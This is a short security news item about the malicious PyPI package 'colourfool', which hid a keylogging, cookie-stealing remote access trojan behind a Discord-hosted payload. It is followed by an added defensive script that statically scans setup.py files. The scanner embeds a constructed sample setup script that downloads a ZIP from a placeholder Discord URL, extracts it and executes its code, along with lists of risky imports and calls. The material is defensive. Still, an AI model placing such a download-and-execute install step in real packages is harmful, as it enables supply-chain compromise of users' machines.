"Experts Identify Fully-Featured Info Stealer and Trojan in Python Package on PyPI"

A malicious Python package uploaded to the Python Package Index (PyPI) was found to contain a fully functional information stealer and Remote Access Trojan (RAT). The package, named "colourfool," was found by Kroll's Cyber Threat Intelligence team, who dubbed the malware "Colour-Blind." According to Kroll researchers, the Colour-Blind malware is indicative of the democratization of cybercrime, which could lead to an intensified threat landscape, as multiple variants can be spawned from code sourced from others. Like other malicious Python modules identified in recent months, the colourfool package hides its malicious code in the setup script, which points to a ZIP archive payload hosted on Discord. The archive contains a Python script (code.py) with modules designed to record keystrokes, steal cookies, and disable security software. This article continues to discuss the discovery of the malicious colourfool Python package with Colour-Blind malware.
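
A setup script that fetches a remote payload, as described above, can be spotted by static inspection before the package is installed. The following is an added example, not code from Kroll, THN or the colourfool package: it parses a setup.py with Python's ast module, never executing it, and flags risky imports, risky calls and embedded URLs. The host list, the import and call lists, and the sample script with its placeholder URL are assumptions constructed for illustration.

```python
import ast
from urllib.parse import urlparse

# Assumption: the page says only "Discord-hosted"; this host and the lists below are illustrative.
STAGING_HOSTS = {"cdn.discordapp.com"}
RISKY_IMPORTS = {"urllib", "requests", "socket", "subprocess", "zipfile", "base64"}
RISKY_CALLS = {"exec", "eval", "compile", "__import__", "system", "Popen", "urlopen", "urlretrieve"}

def scan_setup(source):
    """Return sorted (line, kind, detail) findings for one setup.py, without executing it."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names = [a.name for a in node.names]
        elif isinstance(node, ast.ImportFrom):
            names = [node.module or ""]
        else:
            names = []
        for name in names:
            if name.split(".")[0] in RISKY_IMPORTS:
                findings.add((node.lineno, "import", name))
        if isinstance(node, ast.Call):
            fn = node.func
            called = fn.id if isinstance(fn, ast.Name) else getattr(fn, "attr", None)
            if called in RISKY_CALLS:
                findings.add((node.lineno, "call", called))
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            for token in node.value.split():
                if token.startswith(("http://", "https://")):
                    host = urlparse(token).hostname or ""
                    kind = "staging-url" if host in STAGING_HOSTS else "url"
                    findings.add((node.lineno, kind, host))
    return sorted(findings)

# Constructed sample, not the real colourfool setup script; the URL is a placeholder.
SAMPLE_SETUP = '''\
from setuptools import setup
import urllib.request, zipfile
URL = "https://cdn.discordapp.com/attachments/EXAMPLE/EXAMPLE/payload.zip"
urllib.request.urlretrieve(URL, "p.zip")
zipfile.ZipFile("p.zip").extractall(".")
exec(open("code.py").read())
setup(name="example", version="0.0.1")
'''

if __name__ == "__main__":
    for line, kind, detail in scan_setup(SAMPLE_SETUP):
        print(f"setup.py:{line}: {kind}: {detail}")
```

Run it against the setup.py extracted from a downloaded sdist rather than an installed package, since installing an sdist executes the setup script.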

THN reports "Experts Identify Fully-Featured Info Stealer and Trojan in Python Package on PyPI"

Submitted by Anonymous on